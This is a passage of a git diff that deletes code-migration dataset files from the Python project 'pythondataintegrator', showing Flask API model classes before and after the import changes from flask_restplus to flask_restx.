return {'Result': result, 'Message': message} - - @staticmethod - def get_error_response(message): - return {"IsSuccess": False, 'Message': message} - - -class EntityModel: - def __init__(self, - Id: int = None, - ): - self.Id: int = Id diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.diff deleted file mode 100644 index d5812a2..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/controllers/connection/models/ConnectionModels.py b/src/api/controllers/connection/models/ConnectionModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/connection/models/ConnectionModels.py - +++ b/src/api/controllers/connection/models/ConnectionModels.py -@@ -1,7 +1,7 @@ - import json - from typing import List - --from flask_restplus import fields -+from flask_restx import fields - - from controllers.common.models.CommonModels import EntityModel, CommonModels - from IocManager import IocManager diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.source.py deleted file mode 100644 index 3d2f001..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.source.py +++ /dev/null @@ -1,357 +0,0 @@ -import json -from typing import List - -from flask_restplus import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from IocManager import IocManager -from models.dao.connection import ConnectionFile, ConnectionServer, ConnectionQueue -from models.dao.connection.Connection import Connection -from models.dao.connection.ConnectionDatabase import ConnectionDatabase -from models.dao.connection.ConnectorType import ConnectorType -from models.dao.connection.ConnectionType import ConnectionType - - -class 
ConnectionTypeModel(EntityModel): - - def __init__(self, - Id=None, - Name=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - - -class ConnectorTypeModel(EntityModel): - - def __init__(self, - Id=None, - Name=None, - ConnectionType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - self.ConnectionType = ConnectionType - - -class ConnectionModel(EntityModel): - def __init__(self, - Id=None, - Name=None, - ConnectionType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - self.ConnectionType = ConnectionType - - -class ConnectionServerModel(EntityModel): - - def __init__(self, - Id=None, - Host=None, - Port=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Host = Host - self.Port = Port - - -class ConnectionDatabaseModel(EntityModel): - - def __init__(self, - Id=None, - Sid: str = None, - ServiceName: str = None, - DatabaseName: str = None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Sid: str = Sid - self.ServiceName: str = ServiceName - self.DatabaseName: str = DatabaseName - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionFileModel(EntityModel): - - def __init__(self, - Id=None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionQueueModel(EntityModel): - - def __init__(self, - Id=None, - Protocol: str = None, - Mechanism: str = None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Protocol: str = Protocol - self.Mechanism: str = Mechanism - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionModels: - ns = IocManager.api.namespace('Connection', description='Connection endpoints', path='/api/Connection') - - create_connection_database_model = IocManager.api.model('ConnectionDatabaseModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - 'Sid': fields.String(description='Sid'), - 'ServiceName': fields.String(description='ServiceName'), - 'DatabaseName': fields.String(description='DatabaseName'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - - create_connection_file_model = IocManager.api.model('ConnectionFileModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - create_connection_server_model = IocManager.api.model('ConnectionServerModel', { - 'Host': fields.String(description='Host'), - 
'Port': fields.Integer(description='Port'), - }) - create_connection_queue_model = IocManager.api.model('ConnectionQueueModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Servers': fields.List(fields.Nested(create_connection_server_model), description='Queue Servers', - required=False), - 'Protocol': fields.String(description='Protocol'), - 'Mechanism': fields.String(description='Mechanism'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - - delete_connection_database_model = IocManager.api.model('DeleteConnectionDatabaseModel', { - 'Id': fields.Integer(description='Connection Database Id', required=True), - }) - - check_connection_database_model = IocManager.api.model('CheckConnectionDatabaseModel', { - 'Name': fields.String(description='Connection Name', required=True), - 'Schema': fields.String(description='Schema For Check Connection', required=False, example=""), - 'Table': fields.String(description='Table For Check Connection', required=False, example=""), - }) - - @staticmethod - def get_connection_server_model(connection_server: ConnectionServer) -> ConnectionServerModel: - entity_model = ConnectionServerModel( - Id=connection_server.Id, - Host=connection_server.Host, - Port=connection_server.Port, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_connection_server_models(connection_servers: List[ConnectionServer]) -> List[ConnectionServerModel]: - - entities = [] - for connection_server in connection_servers: - if connection_server.IsDeleted == 0: - entity = ConnectionModels.get_connection_server_model(connection_server) - entities.append(entity) - return entities - - @staticmethod - def get_connection_type_model(connection_type: ConnectionType) -> ConnectionTypeModel: - entity_model = ConnectionTypeModel( - Id=connection_type.Id, - Name=connection_type.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_connection_type_models(connection_types: List[ConnectionType]) -> List[ConnectionTypeModel]: - - entities = [] - for connection_type in connection_types: - entity = ConnectionModels.get_connection_type_model(connection_type) - entities.append(entity) - return entities - - @staticmethod - def get_connector_type_model(connector_type: ConnectorType) -> ConnectorTypeModel: - connection_type = ConnectionModels.get_connection_type_model(connector_type.ConnectionType) - entity_model = ConnectorTypeModel( - Id=connector_type.Id, - Name=connector_type.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - - return result_model - - @staticmethod - def get_connector_type_models(connector_types: List[ConnectorType]) -> List[ConnectorTypeModel]: - - entities = [] - for connector_type in connector_types: - entity = ConnectionModels.get_connector_type_model(connector_type) - entities.append(entity) - return entities - - @staticmethod - def get_connection_model(connection: Connection) -> ConnectionModel: - connection_type = ConnectionModels.get_connection_type_model(connection.ConnectionType) - entity_model = ConnectionModel( - Id=connection.Id, - Name=connection.Name, - ) - result_model = 
json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - return result_model - - @staticmethod - def get_connection_database_entity_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - entity_model = ConnectionDatabaseModel( - Id=connection_database.Id, - Sid=connection_database.Sid, - ServiceName=connection_database.ServiceName, - DatabaseName=connection_database.DatabaseName, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_file_entity_model(connection_file: ConnectionFile) -> ConnectionFileModel: - entity_model = ConnectionFileModel( - Id=connection_file.Id, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_queue_entity_model(connection_queue: ConnectionQueue) -> ConnectionQueueModel: - entity_model = ConnectionQueueModel( - Id=connection_queue.Id, - Protocol=connection_queue.Protocol, - Mechanism=connection_queue.Mechanism, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_database_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - connection = ConnectionModels.get_connection_model(connection_database.Connection) - connector_type = ConnectionModels.get_connector_type_model(connection_database.ConnectorType) - entity_model = ConnectionModels.get_connection_database_entity_model(connection_database) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - result_model['Connection'] = connection - return result_model - - @staticmethod - def get_connection_file_model(connection_file: ConnectionFile) -> ConnectionFileModel: - connection = ConnectionModels.get_connection_model(connection_file.Connection) - connector_type = ConnectionModels.get_connector_type_model(connection_file.ConnectorType) - entity_model = ConnectionModels.get_connection_file_entity_model(connection_file) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - result_model['Connection'] = connection - return result_model - - @staticmethod - def get_connection_database_models(connection_databases: List[ConnectionDatabase]) -> List[ConnectionDatabaseModel]: - - entities = [] - for connection_database in connection_databases: - entity = ConnectionModels.get_connection_database_model(connection_database) - entities.append(entity) - return entities - - @staticmethod - def get_connection_database_result_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - connector_type = ConnectionModels.get_connector_type_model(connection_database.ConnectorType) - entity_model = ConnectionModels.get_connection_database_entity_model(connection_database) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_file_result_model(connection_file: ConnectionFile) -> ConnectionFileModel: - connector_type = ConnectionModels.get_connector_type_model(connection_file.ConnectorType) - entity_model = 
ConnectionModels.get_connection_file_entity_model(connection_file) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_queue_result_model(connection_queue: ConnectionQueue) -> ConnectionQueueModel: - connector_type = ConnectionModels.get_connector_type_model(connection_queue.ConnectorType) - entity_model = ConnectionModels.get_connection_queue_entity_model(connection_queue) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_result_model(connection: Connection) -> ConnectionModel: - connection_type = ConnectionModels.get_connection_type_model(connection.ConnectionType) - entity_model = ConnectionModel( - Id=connection.Id, - Name=connection.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - if connection.ConnectionServers is not None: - result_model['Servers'] = ConnectionModels.get_connection_server_models(connection.ConnectionServers) - - if connection.Database is not None: - connection_database = ConnectionModels.get_connection_database_result_model(connection.Database) - result_model['Database'] = connection_database - if connection.File is not None: - connection_file = ConnectionModels.get_connection_file_result_model(connection.File) - result_model['File'] = connection_file - if connection.Queue is not None: - connection_queue = ConnectionModels.get_connection_queue_result_model(connection.Queue) - result_model['Queue'] = connection_queue - return result_model - - @staticmethod - def get_connection_result_models(connections: List[Connection]) -> List[ConnectionModel]: - entities = [] - for connection in connections: - entity = ConnectionModels.get_connection_result_model(connection) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.target.py deleted file mode 100644 index c5034b5..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.target.py +++ /dev/null @@ -1,357 +0,0 @@ -import json -from typing import List - -from flask_restx import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from IocManager import IocManager -from models.dao.connection import ConnectionFile, ConnectionServer, ConnectionQueue -from models.dao.connection.Connection import Connection -from models.dao.connection.ConnectionDatabase import ConnectionDatabase -from models.dao.connection.ConnectorType import ConnectorType -from models.dao.connection.ConnectionType import ConnectionType - - -class ConnectionTypeModel(EntityModel): - - def __init__(self, - Id=None, - Name=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - - -class ConnectorTypeModel(EntityModel): - - def __init__(self, - Id=None, - Name=None, - ConnectionType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - self.ConnectionType = ConnectionType 
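
Throughout these model classes, entities are turned into JSON-safe dictionaries with the json.loads(json.dumps(obj.__dict__, default=CommonModels.date_converter)) round-trip. The implementation of CommonModels.date_converter is not part of this excerpt, so the sketch below substitutes a hypothetical converter that ISO-formats dates, which is the usual reason such a `default` hook exists:

import json
from datetime import date, datetime


def date_converter(obj):
    # Hypothetical stand-in for CommonModels.date_converter (not shown in
    # this patch): json.dumps calls it for objects it cannot serialize, and
    # rendering datetimes as ISO-8601 strings is the typical behaviour.
    if isinstance(obj, (datetime, date)):
        return obj.isoformat()
    raise TypeError(f"{type(obj).__name__} is not JSON serializable")


class ConnectionServerModel:
    def __init__(self, Id=None, Host=None, Port=None, CreationDate=None):
        self.Id = Id
        self.Host = Host
        self.Port = Port
        self.CreationDate = CreationDate


server = ConnectionServerModel(1, "localhost", 5432, datetime(2021, 1, 1))
# The dumps/loads round-trip yields a plain dict whose values are all
# JSON-native, mirroring the pattern used by the models above.
result = json.loads(json.dumps(server.__dict__, default=date_converter))
print(result)  # {'Id': 1, 'Host': 'localhost', 'Port': 5432, 'CreationDate': '2021-01-01T00:00:00'}
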
- - -class ConnectionModel(EntityModel): - def __init__(self, - Id=None, - Name=None, - ConnectionType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - self.ConnectionType = ConnectionType - - -class ConnectionServerModel(EntityModel): - - def __init__(self, - Id=None, - Host=None, - Port=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Host = Host - self.Port = Port - - -class ConnectionDatabaseModel(EntityModel): - - def __init__(self, - Id=None, - Sid: str = None, - ServiceName: str = None, - DatabaseName: str = None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Sid: str = Sid - self.ServiceName: str = ServiceName - self.DatabaseName: str = DatabaseName - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionFileModel(EntityModel): - - def __init__(self, - Id=None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionQueueModel(EntityModel): - - def __init__(self, - Id=None, - Protocol: str = None, - Mechanism: str = None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Protocol: str = Protocol - self.Mechanism: str = Mechanism - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionModels: - ns = IocManager.api.namespace('Connection', description='Connection endpoints', path='/api/Connection') - - create_connection_database_model = IocManager.api.model('ConnectionDatabaseModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - 'Sid': fields.String(description='Sid'), - 'ServiceName': fields.String(description='ServiceName'), - 'DatabaseName': fields.String(description='DatabaseName'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - - create_connection_file_model = IocManager.api.model('ConnectionFileModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - create_connection_server_model = IocManager.api.model('ConnectionServerModel', { - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - }) - create_connection_queue_model = IocManager.api.model('ConnectionQueueModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Servers': fields.List(fields.Nested(create_connection_server_model), description='Queue Servers', - required=False), - 
'Protocol': fields.String(description='Protocol'), - 'Mechanism': fields.String(description='Mechanism'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - - delete_connection_database_model = IocManager.api.model('DeleteConnectionDatabaseModel', { - 'Id': fields.Integer(description='Connection Database Id', required=True), - }) - - check_connection_database_model = IocManager.api.model('CheckConnectionDatabaseModel', { - 'Name': fields.String(description='Connection Name', required=True), - 'Schema': fields.String(description='Schema For Check Connection', required=False, example=""), - 'Table': fields.String(description='Table For Check Connection', required=False, example=""), - }) - - @staticmethod - def get_connection_server_model(connection_server: ConnectionServer) -> ConnectionServerModel: - entity_model = ConnectionServerModel( - Id=connection_server.Id, - Host=connection_server.Host, - Port=connection_server.Port, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_connection_server_models(connection_servers: List[ConnectionServer]) -> List[ConnectionServerModel]: - - entities = [] - for connection_server in connection_servers: - if connection_server.IsDeleted == 0: - entity = ConnectionModels.get_connection_server_model(connection_server) - entities.append(entity) - return entities - - @staticmethod - def get_connection_type_model(connection_type: ConnectionType) -> ConnectionTypeModel: - entity_model = ConnectionTypeModel( - Id=connection_type.Id, - Name=connection_type.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_connection_type_models(connection_types: List[ConnectionType]) -> List[ConnectionTypeModel]: - - entities = [] - for connection_type in connection_types: - entity = ConnectionModels.get_connection_type_model(connection_type) - entities.append(entity) - return entities - - @staticmethod - def get_connector_type_model(connector_type: ConnectorType) -> ConnectorTypeModel: - connection_type = ConnectionModels.get_connection_type_model(connector_type.ConnectionType) - entity_model = ConnectorTypeModel( - Id=connector_type.Id, - Name=connector_type.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - - return result_model - - @staticmethod - def get_connector_type_models(connector_types: List[ConnectorType]) -> List[ConnectorTypeModel]: - - entities = [] - for connector_type in connector_types: - entity = ConnectionModels.get_connector_type_model(connector_type) - entities.append(entity) - return entities - - @staticmethod - def get_connection_model(connection: Connection) -> ConnectionModel: - connection_type = ConnectionModels.get_connection_type_model(connection.ConnectionType) - entity_model = ConnectionModel( - Id=connection.Id, - Name=connection.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - return result_model - - @staticmethod - def get_connection_database_entity_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - entity_model = ConnectionDatabaseModel( - Id=connection_database.Id, - Sid=connection_database.Sid, - 
ServiceName=connection_database.ServiceName, - DatabaseName=connection_database.DatabaseName, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_file_entity_model(connection_file: ConnectionFile) -> ConnectionFileModel: - entity_model = ConnectionFileModel( - Id=connection_file.Id, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_queue_entity_model(connection_queue: ConnectionQueue) -> ConnectionQueueModel: - entity_model = ConnectionQueueModel( - Id=connection_queue.Id, - Protocol=connection_queue.Protocol, - Mechanism=connection_queue.Mechanism, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_database_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - connection = ConnectionModels.get_connection_model(connection_database.Connection) - connector_type = ConnectionModels.get_connector_type_model(connection_database.ConnectorType) - entity_model = ConnectionModels.get_connection_database_entity_model(connection_database) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - result_model['Connection'] = connection - return result_model - - @staticmethod - def get_connection_file_model(connection_file: ConnectionFile) -> ConnectionFileModel: - connection = ConnectionModels.get_connection_model(connection_file.Connection) - connector_type = ConnectionModels.get_connector_type_model(connection_file.ConnectorType) - entity_model = ConnectionModels.get_connection_file_entity_model(connection_file) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - result_model['Connection'] = connection - return result_model - - @staticmethod - def get_connection_database_models(connection_databases: List[ConnectionDatabase]) -> List[ConnectionDatabaseModel]: - - entities = [] - for connection_database in connection_databases: - entity = ConnectionModels.get_connection_database_model(connection_database) - entities.append(entity) - return entities - - @staticmethod - def get_connection_database_result_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - connector_type = ConnectionModels.get_connector_type_model(connection_database.ConnectorType) - entity_model = ConnectionModels.get_connection_database_entity_model(connection_database) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_file_result_model(connection_file: ConnectionFile) -> ConnectionFileModel: - connector_type = ConnectionModels.get_connector_type_model(connection_file.ConnectorType) - entity_model = ConnectionModels.get_connection_file_entity_model(connection_file) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_queue_result_model(connection_queue: ConnectionQueue) -> ConnectionQueueModel: - connector_type = ConnectionModels.get_connector_type_model(connection_queue.ConnectorType) - 
entity_model = ConnectionModels.get_connection_queue_entity_model(connection_queue) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_result_model(connection: Connection) -> ConnectionModel: - connection_type = ConnectionModels.get_connection_type_model(connection.ConnectionType) - entity_model = ConnectionModel( - Id=connection.Id, - Name=connection.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - if connection.ConnectionServers is not None: - result_model['Servers'] = ConnectionModels.get_connection_server_models(connection.ConnectionServers) - - if connection.Database is not None: - connection_database = ConnectionModels.get_connection_database_result_model(connection.Database) - result_model['Database'] = connection_database - if connection.File is not None: - connection_file = ConnectionModels.get_connection_file_result_model(connection.File) - result_model['File'] = connection_file - if connection.Queue is not None: - connection_queue = ConnectionModels.get_connection_queue_result_model(connection.Queue) - result_model['Queue'] = connection_queue - return result_model - - @staticmethod - def get_connection_result_models(connections: List[Connection]) -> List[ConnectionModel]: - entities = [] - for connection in connections: - entity = ConnectionModels.get_connection_result_model(connection) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.diff deleted file mode 100644 index 6bc96cc..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/controllers/integration/models/DataIntegrationModels.py b/src/api/controllers/integration/models/DataIntegrationModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/integration/models/DataIntegrationModels.py - +++ b/src/api/controllers/integration/models/DataIntegrationModels.py -@@ -1,7 +1,7 @@ - import json - from typing import List - --from flask_restplus import fields -+from flask_restx import fields - - from controllers.common.models.CommonModels import EntityModel, CommonModels - from controllers.connection.models.ConnectionModels import ConnectionModels diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.source.py deleted file mode 100644 index eaab201..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.source.py +++ /dev/null @@ -1,289 +0,0 @@ -import json -from typing import List - -from flask_restplus import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from 
controllers.connection.models.ConnectionModels import ConnectionModels -from IocManager import IocManager -from models.dao.integration.DataIntegration import DataIntegration - - -class DataIntegrationModel(EntityModel): - - def __init__(self, - Id=None, - Code=None, - IsTargetTruncate=None, - IsDelta=None, - CreationDate=None, - Comments=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Code = Code - self.IsTargetTruncate = IsTargetTruncate - self.IsDelta = IsDelta - self.CreationDate = CreationDate - self.Comments = Comments - self.IsDeleted = IsDeleted - - -class DataIntegrationConnectionModel: - - def __init__(self, - Id: int = None, - SourceOrTarget: int = None, - DataIntegration=None, - Database=None, - File=None, - Connection=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.SourceOrTarget: int = SourceOrTarget - self.DataIntegration = DataIntegration - self.Database = Database - self.File = File - self.Connection = Connection - - -class DataIntegrationConnectionDatabaseModel: - - def __init__(self, - Id: int = None, - Schema: str = None, - TableName: str = None, - Query: str = None, - *args, **kwargs): - self.Id: int = Id - self.Schema: str = Schema - self.TableName: str = TableName - self.Query: str = Query - - -class DataIntegrationConnectionFileModel: - - def __init__(self, - Id: int = None, - Folder: str = None, - FileName: str = None, - *args, **kwargs): - self.Id: int = Id - self.Folder: str = Folder - self.FileName: str = FileName - - -class DataIntegrationConnectionQueueModel: - def __init__(self, - Id: int = None, - TopicName: str = None, - *args, **kwargs): - self.Id: int = Id - self.TopicName: str = TopicName - - -class DataIntegrationConnectionFileCsvModel: - - def __init__(self, - Id: int = None, - HasHeader: bool = None, - Header: str = None, - Separator: str = None, - *args, **kwargs): - self.Id: int = Id - self.HasHeader: bool = HasHeader - self.Header: str = Header - self.Separator: str = Separator - - -class DataIntegrationColumnModel: - - def __init__(self, - Id=None, - ResourceType=None, - SourceColumnName=None, - TargetColumnName=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.ResourceType = ResourceType - self.SourceColumnName = SourceColumnName - self.TargetColumnName = TargetColumnName - - -class DataIntegrationModels: - ns = IocManager.api.namespace('DataIntegration', description='Data Integration endpoints', - path='/api/DataIntegration') - - data_integration_connection_database_model = IocManager.api.model('DataIntegrationConnectionDatabaseModel', { - 'Schema': fields.String(description='Schema', required=False), - 'TableName': fields.String(description='TableName', required=False), - 'Query': fields.String(description='Query', required=False), - }) - - data_integration_connection_file_csv_model = IocManager.api.model('DataIntegrationConnectionFileCsvModel', { - 'HasHeader': fields.Boolean(description='HasHeader', required=False), - 'Header': fields.String(description='Header', required=False), - 'Separator': fields.String(description='Separator', required=False), - }) - - data_integration_connection_file_model = IocManager.api.model('DataIntegrationConnectionFileModel', { - 'Folder': fields.String(description='Folder', required=False), - 'FileName': fields.String(description='FileName', required=False), - 'Csv': fields.Nested(data_integration_connection_file_csv_model, description='Csv'), - }) - 
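
The request/response schemas above are declared with flask-restx's api.model and composed through fields.Nested, which is what lets the file model embed the CSV model (and, earlier, lets connection payloads embed server lists). A minimal self-contained sketch, using a bare Flask app in place of the IocManager.api wiring that this excerpt does not show:

from flask import Flask
from flask_restx import Api, fields

app = Flask(__name__)
api = Api(app)  # stand-in for IocManager.api, whose setup is not in this patch

csv_model = api.model('CsvModel', {
    'HasHeader': fields.Boolean(description='HasHeader', required=False),
    'Separator': fields.String(description='Separator', required=False),
})

# fields.Nested embeds one documented model inside another, so the generated
# Swagger schema shows the CSV options as a sub-object of the file payload.
file_model = api.model('FileModel', {
    'FileName': fields.String(description='FileName', required=False),
    'Csv': fields.Nested(csv_model, description='Csv'),
})
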
data_integration_connection_queue_model = IocManager.api.model('DataIntegrationConnectionQueueModel', { - 'TopicName': fields.String(description='TopicName', required=False), - }) - data_integration_connection_model = IocManager.api.model('DataIntegrationConnectionModel', { - 'ConnectionName': fields.String(description='ConnectionName', required=False), - 'Database': fields.Nested(data_integration_connection_database_model, description='Database connection'), - 'File': fields.Nested(data_integration_connection_file_model, description='File connection'), - 'Queue': fields.Nested(data_integration_connection_queue_model, description='Queue connection'), - 'Columns': fields.String(description='Columns'), - }) - - data_integration_model = IocManager.api.model('DataIntegrationModel', { - 'Code': fields.String(description='Operation code value', required=True), - 'SourceConnections': fields.Nested(data_integration_connection_model, description='Source Connections', - required=False), - 'TargetConnections': fields.Nested(data_integration_connection_model, - description='Target Connections', - required=True), - 'IsTargetTruncate': fields.Boolean(description='IsTargetTruncate', required=True), - 'IsDelta': fields.Boolean(description='IsDelta'), - 'Comments': fields.String(description='Comments'), - }) - - @staticmethod - def get_data_integration_model(data_integration: DataIntegration) -> DataIntegrationModel: - source_list = [x for x in data_integration.Connections if x.SourceOrTarget == 0] - source = None - if source_list is not None and len(source_list) > 0: - source_connection = source_list[0] - entity_source = DataIntegrationConnectionModel( - Id=source_connection.Id, - SourceOrTarget=source_connection.SourceOrTarget - ) - source = json.loads(json.dumps(entity_source.__dict__, default=CommonModels.date_converter)) - - if source_connection.Database is not None: - entity_source_database = DataIntegrationConnectionDatabaseModel( - 